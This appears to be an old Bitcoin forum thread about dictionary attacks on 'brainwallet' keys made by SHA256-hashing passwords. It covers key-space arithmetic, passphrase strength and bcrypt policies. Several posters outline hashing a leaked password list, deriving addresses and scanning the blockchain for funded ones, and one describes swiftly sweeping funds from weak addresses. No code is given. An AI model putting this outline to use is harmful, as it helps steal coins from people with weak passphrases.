Pages:
Author

Topic: Results of dictionary attack on SHA256 hashed keys (Read 12533 times)

member
Activity: 67
Merit: 130
I don't understand why everyone writes about billions of keys per second. It's really slower than you think, at least for now.
Calculating sha256 is really just a tiny fraction of calculating an ecdsa keypair.
While vanitygen only does 1 EC addition, calculating an ecdsa key from seed needs at least two full blown multiplications of big numbers.
Long story short, CPUs only can generate about 1,000 keys a second, modern GPUs can calculate 20,000 keys a second, tops.
Not billions, thousands. 6 orders of magnitude smaller than billions. 1,000 times slower than vanitygen.

Vod
legendary
Activity: 3668
Merit: 3010
Licking my boob since 1970
Probably a stupid question but how much space would be needed for a db of every hash and value?

Well "every value" is simply an infinite number.

However to store say every passphrase using printable symbol on a standard keyboard (95) up to a length of 20 would be

95^20 = 3.58 x 10^39 records

If we assume no overhead and an average of 10.5 bytes for the input and 32 bytes for the hash that would be:

1.52 x 10^41 bytes
~152,356,517,023,630,000,000,000,000,000 1 TB hard drives.

The earth has about 1.3x10^50 atoms so even storing 1 bit per atom it would take up roughly a planet sized body.  Of course if the user had salt their hash wouldn't exist in your database.  To account for every 32 bit salt would require ~4 billion earth sized planets.

So you're saying there's a chance...

LOL  +1  "Dumb and Dumber"  Smiley
full member
Activity: 136
Merit: 100
PS: Are 25 characters enough for a strong passphrase?

25 random characters is plenty.  25 letter 'a's isn't.  There's a range between these two extremes.

Of course, you are correct. That does answer my question though, thanks.

legendary
Activity: 2940
Merit: 1333
PS: Are 25 characters enough for a strong passphrase?

25 random characters is plenty.  25 letter 'a's isn't.  There's a range between these two extremes.
full member
Activity: 136
Merit: 100
If I understand this correctly, these are all brain wallet addresses?



Mounting a more sophisticated attack could get interesting, but I'm afraid of what I'll find. Wink  Just remember to use strong passwords if you go the "brainwallet" way!


Hey, do go ahead. If you were to find something, it'd be better if we knew NOW rather than later.

PS: Are 25 characters enough for a strong passphrase?

legendary
Activity: 2940
Merit: 1333
Ha, we both found SHA256("fuckyou") which TTBit says he funded as an experiment.  It looks like I found your other address too -- are you saying you found more that I didn't find, and that you didn't post there?

I was saying that you didn't find any of the ones I found, but I was wrong.  I was comparing the transaction IDs you listed with the sha256 hashes I listed.  Duh.
legendary
Activity: 2618
Merit: 1007
Maybe a bit related: How many private keys can a wallet hold in the satoshi client and/or Armory? Millions? Billions? Terabytes? Petabytes?

The reason would be that for serious bruteforcing, one would constantly (for every block on the network) check all your gazillions of addresses if they have been funded - if yes, quickly snatch the money and sign a transaction. To do this though, one would need to iterate over a LOT of data (at least address wise, the block's data could probably be broken down into "address that received money" parts).
sr. member
Activity: 476
Merit: 250
I recently played around with this myself and found that SHA-256("test") has been used: http://blockchain.info/address/1HKqKTMpBTZZ8H5zcqYEWYBaaWELrDEXeE
Funny story behind this address. Two of those transactions were mine, one was not. Someone was obviously scanning that address for incoming transactions, and snatched the rest. The set of transactions was from testing the commitcoin protocol, and at the time I was scared someone actually calculated the private key (which can be calculated from the first two transactions and the third transaction, that is now marked as double spend, since the corresponding signatures use the same randomness). Later I found out I forgot to set the flag that included 80 bits of randomness to the message (which as stated was "test"). Smiley
hero member
Activity: 784
Merit: 1009
firstbits:1MinerQ
This answer is pretty thorough and probably correct.  The TL;DR is that you're highly unlikely to randomly generate the same private key that someone else has, and picking a rich address and guessing its private key is much much more unlikely.  Barring huge advances in computing power or in mathematically breaking the cryptography, everyone's coins are very safe.  And, anyone with remotely enough computing power to consider trying to steal coins would make more mining.
And even if you can generate hashes quickly you'd have a hard time querying the blockchain at anything close to that rate. I'm sure that is more a limit than the hashing. (But that's not the same as OP here as he didn't randomly generate hashes)
sr. member
Activity: 448
Merit: 254
I'd been thinking about trying it out of curiosity for awhile, and last night that curiosity finally overcame laziness.  I hacked together a script to SHA256-hash every password in a large (14 million) password leak, compute the corresponding address, and scan the blockchain for transactions touching those addresses (using blockparser.)

I did something similar some months ago and found different addresses that you did:

http://bitcoin.stackexchange.com/a/3170/659

Ha, we both found SHA256("fuckyou") which TTBit says he funded as an experiment.  It looks like I found your other address too -- are you saying you found more that I didn't find, and that you didn't post there?  I wonder if I could find more with better dictionaries (especially curating entries that bitcoiners might be likely to use.)

BTW, I've since re-run the script searching for transactions using Casascius' deterministic passphrase wallet (something like KeyN = SHA256(String(N)+"/"+passphrase+"/BITCOIN"+String(N)) where N = 1 to infinity for the keys in the wallet) and found nothing, so it looks like anyone seriously using this type of "brainwallet" is picking non-stupid passwords.

So whats the chances of finding some private key? If an uberminer generated hashes non stop and comparing them with the whole block chain what are the chances of him getting a hit?

This answer is pretty thorough and probably correct.  The TL;DR is that you're highly unlikely to randomly generate the same private key that someone else has, and picking a rich address and guessing its private key is much much more unlikely.  Barring huge advances in computing power or in mathematically breaking the cryptography, everyone's coins are very safe.  And, anyone with remotely enough computing power to consider trying to steal coins would make more mining.
donator
Activity: 2058
Merit: 1007
Poor impulse control.
So whats the chances of finding some private key? If an uberminer generated hashes non stop and comparing them with the whole block chain what are the chances of him getting a hit?

I once worked out how probable that was. I forget what the exact probability was but it was a number with about one hundred zeros after it.

Assume a 1 in 1e100 chance per hash. You can work out yourself how many billion years it would take to brute force every address, even if you had the hashrate of the entire bitcoin network at your disposal.

legendary
Activity: 2940
Merit: 1333
I'd been thinking about trying it out of curiosity for awhile, and last night that curiosity finally overcame laziness.  I hacked together a script to SHA256-hash every password in a large (14 million) password leak, compute the corresponding address, and scan the blockchain for transactions touching those addresses (using blockparser.)

I did something similar some months ago and found different addresses that you did:

http://bitcoin.stackexchange.com/a/3170/659
hero member
Activity: 546
Merit: 500

I have generated the private keys for all of the 8 addresses listed, by taking the SHA256 hash of passwords from a password list. 


Is the SHA256 hash easier to break than MD5?
No.

Thanks...
rjk
sr. member
Activity: 448
Merit: 250
1ngldh

I have generated the private keys for all of the 8 addresses listed, by taking the SHA256 hash of passwords from a password list. 


Is the SHA256 hash easier to break than MD5?
No.
hero member
Activity: 546
Merit: 500

I have generated the private keys for all of the 8 addresses listed, by taking the SHA256 hash of passwords from a password list. 


Is the SHA256 hash easier to break than MD5?
newbie
Activity: 24
Merit: 0
Just theorizing but I think most password requirements are worthless and are checking the wrong thing.

Personally if I had a site I would
a) use bcrypt which ensures passwords of 8 characters or more can't be brute forced
b) require passwords to be 8 characters
c) lookup user's attempted password against db of known/weak/leaked passwords and reject it if found.

No need for "Th!s is my @nnoyingly l0ng password333".

"happy clown jumper" all lower case can't be brute forced if protected by bcrypt and isn't on any password list used by hackers.

TheirChildrensMiddleNames
hero member
Activity: 520
Merit: 500
Probably a stupid question but how much space would be needed for a db of every hash and value?
3.123 * 10^87 gigabytes. More storage capacity than the NSA has.

If your number is right, that's not simply "more capacity than NSA has". That's more gigabytes than some estimations of the number of atoms in the known universe.

We can't store information at the sub-atomic level yet? Scientists be slackin'.
legendary
Activity: 1106
Merit: 1004
Probably a stupid question but how much space would be needed for a db of every hash and value?
3.123 * 10^87 gigabytes. More storage capacity than the NSA has.

If your number is right, that's not simply "more capacity than NSA has". That's more gigabytes than some estimations of the number of atoms in the known universe.
full member
Activity: 196
Merit: 100
Web Dev, Db Admin, Computer Technician
Probably a stupid question but how much space would be needed for a db of every hash and value?
3.123 * 10^877 gigabytes (for just one type of format, the private key, add public address and your needs almost double). More storage capacity than the NSA has.

Edit: My bad. I put an 8 were there should have been a 7.
donator
Activity: 1218
Merit: 1079
Gerald Davis
Just theorizing but I think most password requirements are worthless and are checking the wrong thing.

Personally if I had a site I would
a) use bcrypt which ensures passwords of 8 characters or more can't be brute forced
b) require passwords to be 8 characters
c) lookup user's attempted password against db of known/weak/leaked passwords and reject it if found.

No need for "Th!s is my @nnoyingly l0ng password333".

"happy clown jumper" all lower case can't be brute forced if protected by bcrypt and isn't on any password list used by hackers.
Pages:
Jump to: